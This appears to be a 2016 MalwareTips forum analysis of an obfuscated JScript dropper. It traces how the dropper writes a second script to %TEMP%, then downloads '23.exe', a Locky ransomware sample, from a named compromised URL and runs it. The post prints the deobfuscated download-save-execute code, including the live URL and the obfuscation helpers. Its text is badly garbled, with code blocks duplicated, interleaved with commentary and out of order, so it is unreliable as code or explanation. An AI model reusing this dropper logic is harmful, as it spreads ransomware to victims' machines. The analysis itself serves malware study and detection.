From malware Vault (samples) :
https://malwaretips.com/threads/10-10-2016-5.64335/
Thanks to @Daniel Hidalgo
details_eyrgV.js
4/56 when posting
Antivirus scan for b8551f47835abb556205e67aaefd4ad07a2a0a638dc937cc3b91fc5d971dff6f at 2016-10-10 20:39:49 UTC - VirusTotal
1) What it looks like :
2) Quick analysis :
4) Deobfuscation of YAydz.js :
https://malwaretips.com/threads/10-10-2016-5.64335/
Thanks to @Daniel Hidalgo
details_eyrgV.js
4/56 when posting
Antivirus scan for b8551f47835abb556205e67aaefd4ad07a2a0a638dc937cc3b91fc5d971dff6f at 2016-10-10 20:39:49 UTC - VirusTotal
1) What it looks like :
var XszHCayO = new Date();
while (true) {
var BxrDqFDU = "j}n<L}^olLe<!<ryk<X}hy45'ktupy4hniy5<gj}n<Sel]TR<!<ryk<X}hy45'j}n<m~vOisr<!
...
...
VT{ID'KVviE775gyRks7!PsmOYVJE2t}n]h4Q}ht2zpssn4Q}ht2n}rxsq456PsmOYVJE2pyr{ht55'anyhinr<yRks'azirhusr<RNxNT~OfnPJkuo4oJFDRZtKrRflix5<gnyhinr<ryk<]hujyDS~vyh4oJFDRZtKrRflix5'a";
ndGoMrN = QUJzuD(BxrDqFDU);
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
udlqE.Write(ndGoMrN);
udlqE.Close();
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
function QUJzuD(cmDIoyF) {
function MTizWw(UFfwuQh) {
function luauVFis(EuKqPkWb, DGftJFg) {
while (true) {
var jLvbGowH = new Date();
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
WScript.Sleep(500);
}var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
break;
}WScript.Sleep(500);
var BxrDqFDU = "j}n<L}^olLe<!<ryk<X}hy45'ktupy4hniy5<gj}n<Sel]TR<!<ryk<X}hy45'j}n<m~vOisr<!
...
...
VT{ID'KVviE775gyRks7!PsmOYVJE2t}n]h4Q}ht2zpssn4Q}ht2n}rxsq456PsmOYVJE2pyr{ht55'anyhinr<yRks'azirhusr<RNxNT~OfnPJkuo4oJFDRZtKrRflix5<gnyhinr<ryk<]hujyDS~vyh4oJFDRZtKrRflix5'a";
ndGoMrN = QUJzuD(BxrDqFDU);
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
udlqE.Write(ndGoMrN);
udlqE.Close();
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
function QUJzuD(cmDIoyF) {
var ePqNkIe = '2' + '8';
var WXifTe = '"' + new Date() + '"';
var UYqmNGk = "bPnHVkXJPq" + "emZmyVLKoFFzOljGMsAzP" + "VazuhDqPWcHIELNyrhQBYdfycRcriVoJctmpUdzIXfxEfuEcviDfiIDLtojnpdDIANPfohpHmRzfzZtCdULRGOnlrzam....
...
CfDXXYLOXiNQxaCpfTtqnUefzISQCpigpIxXjryYrCXheQWnGYcjNISGUBtwQnCwyZHhuUaHXdUlRCkpWiYrgxKM";
var oYBnsPCJ = 0;
while (oYBnsPCJ < cmDIoyF.length) {
return WXifTe;
}var WXifTe = '"' + new Date() + '"';
var UYqmNGk = "bPnHVkXJPq" + "emZmyVLKoFFzOljGMsAzP" + "VazuhDqPWcHIELNyrhQBYdfycRcriVoJctmpUdzIXfxEfuEcviDfiIDLtojnpdDIANPfohpHmRzfzZtCdULRGOnlrzam....
...
CfDXXYLOXiNQxaCpfTtqnUefzISQCpigpIxXjryYrCXheQWnGYcjNISGUBtwQnCwyZHhuUaHXdUlRCkpWiYrgxKM";
var oYBnsPCJ = 0;
while (oYBnsPCJ < cmDIoyF.length) {
WXifTe += MTizWw(ePqNkIe ^ luauVFis(cmDIoyF, oYBnsPCJ));
oYBnsPCJ++;
}oYBnsPCJ++;
return WXifTe;
function MTizWw(UFfwuQh) {
return String.fromCharCode(UFfwuQh);
}function luauVFis(EuKqPkWb, DGftJFg) {
return EuKqPkWb.charCodeAt(DGftJFg)
}2) Quick analysis :
2-1) Timer :
3) YAydz.js :var XszHCayO = new Date();
while (true) {
}
while (true) {
var jLvbGowH = new Date();
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
break;
}
wait 7 s before running the next part
2-2) vars that hide some data :var BxrDqFDU
var UYqmNGk
2-3) functions :var UYqmNGk
- QUJzuD(a_string_to_decode)
2-4) Some important objects / parts:=> decode the BxrDqFDU string
=> here, UYqmNGk seems not to be used
- MTizWw(index)=> here, UYqmNGk seems not to be used
=> fromCharCode(index)
- luauVFis(a_string, index)
=> a_string.charCodeAt(index)
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
=> object Shell
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
=> object FileSystemObject
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
=> String.fromCharCode(92) => char \
=> Opens a file as text at the location %TEMP%\YAydz.js
udlqE.Write(ndGoMrN);
=> Opens a file as text at the location %TEMP%\YAydz.js
parameter 2 : for writing
parameter true : opens the file as Unicode
parameter true : opens the file as Unicode
=> write the real part of new js file in : YAydz.js
(remember that ndGoMrN is a var holding the "decrypted" string)
udlqE.Close();
(remember that ndGoMrN is a var holding the "decrypted" string)
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
=> the new js script YAydz.js is run
Calling the QUJzuD function with the obfuscated var BxrDqFDU (part of its content is shown above) gave me the real content that is written into the new js script.
This script also has obfuscated parts, as you can see in the spoiler below.

What we can already see, easily :
- URL used to download the bad file : http ://lcbschool2.ac.th/pic/_notes/logs.php
- Payload : 23.exe
This script also has obfuscated parts, as you can see in the spoiler below.
I modified some parts, as usual, to avoid a "copy-paste", "save" => infection scenario. Tue Oct 11 00: 58: 17 UTC + 0200 2016
var PaBspPy = new Date();
while (true) {
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
/*GxIKdgKHbXRhdGxJqtskrVVknyXGHNQYEatiKVXLeLuEpgclytMFihRkzKjZcLfwWxxALEEIAtqTVBaGZmATsniegOPmSCNPHNVLfhEzqVGdTOsVUZIbWmSRfNOsamPaMXMPSDYjAqpfmWeeiGjcUfVyzEhrCQkfkaXNaSLMdErcYWjgQfdXkRsZlqTkyoZebWBEAbRjZN*/
JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
while (true) {
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
function zUEI(AObIuR, gIHhfCj) {
function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
function JUCrdtgehFJVs() { /*BXFGoKwgCD().Sleep(3431-850);*/ }
function UJKNDhc() {
function vxBB(znjEdk) {
function XlMajTFT(KBnCTHPmC) {
function kPHcIta(lZgc, wIgZz) {
function BXFGoKwgCD() {
function HYAOvNTfV(eOQHbx) {
function gLdF(CHvXDVM, QoNTkoU) {
CHvXDVM.saveToFile(QoNTkoU, 2);
}
function hBICuPa(wZzwN) {
wZzwN.close();
}
function QfTXccy() {
function jtHnXesK(JHgUX) {
function NRdRHbSzrLVwis(sVZXNFhWnNzpud) {
var PaBspPy = new Date();
while (true) {
var OcypAHN = new Date();
var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
WScript.Sleep(500);
}var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
break;
}WScript.Sleep(500);
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
aUwoWNL = 0x1;
LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
}LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
while (true) {
if (maGZS.length <= 553 - 553) break;
var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
atjq++;
maGZS.splice(RwQU, 220 - 219);
}var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var hOYBosi = function() {
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
}();return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\'
'+xHooWxtNky+'\\
'');
if (tzDwPJI.Count >= 1) {
break;
}
} catch (e) {}var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\'
'+xHooWxtNky+'\\
'');
if (tzDwPJI.Count >= 1) {
break;
}
atjq++;
maGZS.splice(RwQU, 220 - 219);
function wQklCQ(sWvBtu) {var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}return sWvBtu[MevmLzbS[0]]('%TMP%')
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
try {
}ranvqXxw.open();
XlMajTFT(ranvqXxw);
kPHcIta(ranvqXxw, KQVdE);
HYAOvNTfV(ranvqXxw);
gLdF(ranvqXxw, RznDKByMGT);
JLsTtDfs = ranvqXxw.size;
hBICuPa(ranvqXxw);
return JLsTtDfs;
} catch (e) {}XlMajTFT(ranvqXxw);
kPHcIta(ranvqXxw, KQVdE);
HYAOvNTfV(ranvqXxw);
gLdF(ranvqXxw, RznDKByMGT);
JLsTtDfs = ranvqXxw.size;
hBICuPa(ranvqXxw);
return JLsTtDfs;
function zUEI(AObIuR, gIHhfCj) {
try {
}pKGA = 'G*ugOEbfqTpR*E*T*esPcxzFXmmrp'.split('*');
gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");
gIHhfCj.send();
} catch (e) {}gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");
gIHhfCj.send();
function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
OITsX = ZuFfvwAc.split(vkeetFrRO);
kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
return kQNJaQj.substring(3, kQNJaQj.length);
}kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}return kQNJaQj.substring(3, kQNJaQj.length);
// No-op decoy: its only statement is commented out, so the call placed just before the
// main loop does nothing at runtime (the author flags it as "useless" padding).
function JUCrdtgehFJVs() { /*BXFGoKwgCD().Sleep(3431-850);*/ }
function UJKNDhc() {
var IZlKZJ = ["random"];
return Math[IZlKZJ[0]]()
}return Math[IZlKZJ[0]]()
function vxBB(znjEdk) {
znjEdk.open();
}function XlMajTFT(KBnCTHPmC) {
KBnCTHPmC.type = 1;
}function kPHcIta(lZgc, wIgZz) {
lZgc.write(wIgZz);
}function BXFGoKwgCD() {
return /*ujUqQoxgBsPMUVbsMVLKwQZaPEvZjJfSxfGqVqfGvngyrwNdzOHilOQXtvWiqhbaTVMltlhZJbQdhQUIFBWztHcNrgQkQxrcIElYlaBmr*/ WScript;
}function HYAOvNTfV(eOQHbx) {
var ODlFrgLxqq = [];
eOQHbx.position = ODlFrgLxqq.length * (636299 - 224);
}eOQHbx.position = ODlFrgLxqq.length * (636299 - 224);
// Thin wrapper around ADODB.Stream.SaveToFile; the stream passed in is the object built
// from PednY('ADO&DB&...&Stream') in the main loop, and the path is HyOrvCT (%TMP% + "\" + "23.exe").
// Option 2 = create/overwrite, so this is the exact point where the downloaded response
// body lands on disk - a script host writing an .exe into the temp directory is the
// behaviour to alert on.
function gLdF(CHvXDVM, QoNTkoU) {
CHvXDVM.saveToFile(QoNTkoU, 2);
}
// Closes the ADODB.Stream; called from MjnZz right after the stream size has been read.
function hBICuPa(wZzwN) {
wZzwN.close();
}
function QfTXccy() {
var UkDb = 99999 + 1;
var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
}var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
function jtHnXesK(JHgUX) {
var LoqSEJVY = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
for (var WJjuY = 0; WJjuY < JHgUX; WJjuY++) {
ecNwo += LoqSEJVY.charAt(Math.floor(Math.random() * LoqSEJVY.length));
}
return ecNwo;
}for (var WJjuY = 0; WJjuY < JHgUX; WJjuY++) {
ecNwo += LoqSEJVY.charAt(Math.floor(Math.random() * LoqSEJVY.length));
}
return ecNwo;
function NRdRHbSzrLVwis(sVZXNFhWnNzpud) {
return new ActiveXObject(sVZXNFhWnNzpud);
}What we can already see, easily :
- URL used to download the bad file : http ://lcbschool2.ac.th/pic/_notes/logs.php
- Payload : 23.exe
4) Deobfuscation of YAydz.js :
4-1) Timer :
5) To summarize :var PaBspPy = new Date();
while (true) {
=> wait 6 seconds
while (true) {
var OcypAHN = new Date();
var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
WScript.Sleep(500);
}var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
break;
}WScript.Sleep(500);
=> wait 6 seconds
4-2 ) Main loop :JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
This is the main loop; it uses a mix of useful and useless (decoy) functions/vars.
while (true) {
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
This is the main loop; it uses a mix of useful and useless (decoy) functions/vars.
while (true) {
if (maGZS.length <= 553 - 553) break;
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
atjq++;
maGZS.splice(RwQU, 220 - 219);
}var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var hOYBosi = function() {
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
}();return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\' '+xHooWxtNky+'\\'');
if (tzDwPJI.Count >= 1) {
} catch (e) {}var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\' '+xHooWxtNky+'\\'');
if (tzDwPJI.Count >= 1) {
break;
}atjq++;
maGZS.splice(RwQU, 220 - 219);
4-3) Objects created: the method used to obfuscate them. A very important function is used:
But we will see that it is, hum, a "lol" function (but good enough to do its job).
Let's see the different calls to this function:
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
4-4) Deobfuscation :function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
It is the main function used to "deobfuscate" the strings at the points where COM objects have to be created.
OITsX = ZuFfvwAc.split(vkeetFrRO);
kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}
return kQNJaQj.substring(3, kQNJaQj.length);
}kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}
return kQNJaQj.substring(3, kQNJaQj.length);
But we will see that it is, hum, a "lol" function (but good enough to do its job).
Let's see the different calls to this function:
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
- PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
and returns a string built from the parts at the indexes given in the array parameter
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
Here, the function splits the string into parts separated by '&' (the separator parameter) and returns a string built from the parts at the indexes given in the array parameter.
- PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));=> 0 => WS
=> 2 => cript
=> 4 => .She
=> 5 => l
=> 6 => l
=> "WScript.Shell"
- in function PednY :=> 2 => cript
=> 4 => .She
=> 5 => l
=> 6 => l
=> "WScript.Shell"
kQNJaQj = 'qAV';
=> useless 3 chars added
kQNJaQj.substring(3, kQNJaQj.length);
=> useless 3 chars removed
=> useless 3 chars added
kQNJaQj.substring(3, kQNJaQj.length);
=> useless 3 chars removed
- PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> "MSXML2.XMLHTTP"
- PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> "ADODB.Stream"
JUCrdtgehFJVs();
=> to obfuscate a bit more => useless
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
=> array of url
var atjq = 362 - 362; => 0
while (true) {if (maGZS.length <= 0) break;
var InnRbGOcN = maGZS[RwQU];
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793; => 1
var tsUuHCfxc = function() {
try {
atjq++;
}=> break if no URLs are left in the array of URLs maGZS
var RwQU = QfTXccy() % maGZS.length;
=> RwQU : a random valid index of the array of URLs
function QfTXccy() {
function UJKNDhc() {
var UkDb = 99999 + 1;
var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
}var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
function UJKNDhc() {
var IZlKZJ = ["random"];
return Math[IZlKZJ[0]]()
}return Math[IZlKZJ[0]]()
var InnRbGOcN = maGZS[RwQU];
=> retrieves the corresponding URL from the array (here, only one URL is available)
=> we will see at the end of the loop that the URL just used is removed from the array of URLs
var qLQpX = QfTXccy();
=> we will see at the end of the loop that the URL just used is removed from the array of URLs
=> maGZS.splice(RwQU, 220 - 219);
=> maGZS.splice(index_used, 1);
=> maGZS.splice(index_used, 1);
=> useless
-------------------------------------------------------------------------------------------------------------
=> in this sample, there is only one URL, but the script is
made to take into account multiple URLs, if available
----------------------------------------------------------------------------------------------------------------
var xHooWxtNky = '23.exe'; => the payload name=> in this sample, there is only one URL, but the script is
made to take into account multiple URLs, if available
----------------------------------------------------------------------------------------------------------------
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793; => 1
var tsUuHCfxc = function() {
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();=> tsUuHCfxc : object shell from "WScript.Shell"
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
// Resolves the drop directory: calls ExpandEnvironmentStrings('%TMP%') on the WScript.Shell
// object passed in (tsUuHCfxc). The method is reached through a computed property name,
// presumably so that "ExpandEnvironmentStrings" never appears as a plain identifier in
// the script body.
function wQklCQ(sWvBtu) {
var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}
var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}
=> HyOrvCT : "%TEMP%\23.exe"
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();=> jSerZ : object http from "MSXML2.XMLHTTP"
zUEI(InnRbGOcN, jSerZ);
function zUEI(AObIuR, gIHhfCj) {
try {
}pKGA = 'G*ugOEbfqTpR*E*T*esPcxzFXmmrp'.split('*');
gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.send();
} catch (e) {}gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
=> open a connection with "GET", URL, false
=> URL : "http ://lcbschool2.ac.th/pic/_notes/logs.php"
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");=> URL : "http ://lcbschool2.ac.th/pic/_notes/logs.php"
gIHhfCj.send();
=> http request "GET" to "http ://lcbschool2.ac.th/pic/_notes/logs.php" with header "User-Agent", "Python-urllib/3.1"
if (jSerZ.status == 100 + 100) {
=> 200 : status "OK" => request successful
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
var hOYBosi = function() {return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> object Stream from "ADODB.Stream"
}();=> object Stream from "ADODB.Stream"
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
}
try {
ranvqXxw.open();
hBICuPa(ranvqXxw);
} catch (e) {}ranvqXxw.open();
=> open a Stream
XlMajTFT(ranvqXxw);
=> stream.type = 1
kPHcIta(ranvqXxw, KQVdE);
=> stream.write(ResponseBody): writes the HTTP response body into the stream
HYAOvNTfV(ranvqXxw);
=> stream.position = 0
gLdF(ranvqXxw, RznDKByMGT);
=>stream.saveToFile(HyOrvCT, 2);
=> "%TEMP%\23.exe" and 2 : create /overwrite the file
JLsTtDfs = ranvqXxw.size;=> "%TEMP%\23.exe" and 2 : create /overwrite the file
hBICuPa(ranvqXxw);
=> stream.close()
return JLsTtDfs;
=> return the size
}
=> From ResponseBody to file "%TEMP%\23.exe"
=> rApODBCFzQmM : size
=> rApODBCFzQmM : size
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
if (tzDwPJI.Count >= 1) {
} catch (e) {}
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
aUwoWNL = 0x1;
LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
}LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
=> try to run the Payload
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery("Select * from Win32_Process Where Name = " + xHooWxtNky);
=> checks whether the payload is running
if (tzDwPJI.Count >= 1) {
break;
=> at least one process of 23.exe => exit
}=> at least one process of 23.exe => exit
atjq++;
=> not used
maGZS.splice(RwQU, 220 - 219);
=> completely removes the element at index RwQU (the URL used in the current iteration)
=> size of array -1
=> here, only one URL => maGZS will be empty, and the next iteration makes the script stop
=> size of array -1
=> here, only one URL => maGZS will be empty, and the next iteration makes the script stop
- A first script is used to create a second script in %TEMP%\YAydz.js,
- YAydz.js is run
- YAydz.js is run
- requests url "http ://lcbschool2.ac.th/pic/_notes/logs.php"
- and save the payload to "%TEMP%\23.exe"
- try to run the payload
- quits the script if the payload is already running or if the URL array is empty
=> here, only one URL => one try
- and save the payload to "%TEMP%\23.exe"
- try to run the payload
- quits the script if the payload is already running or if the URL array is empty
=> here, only one URL => one try
Payload :
A Locky ransomware sample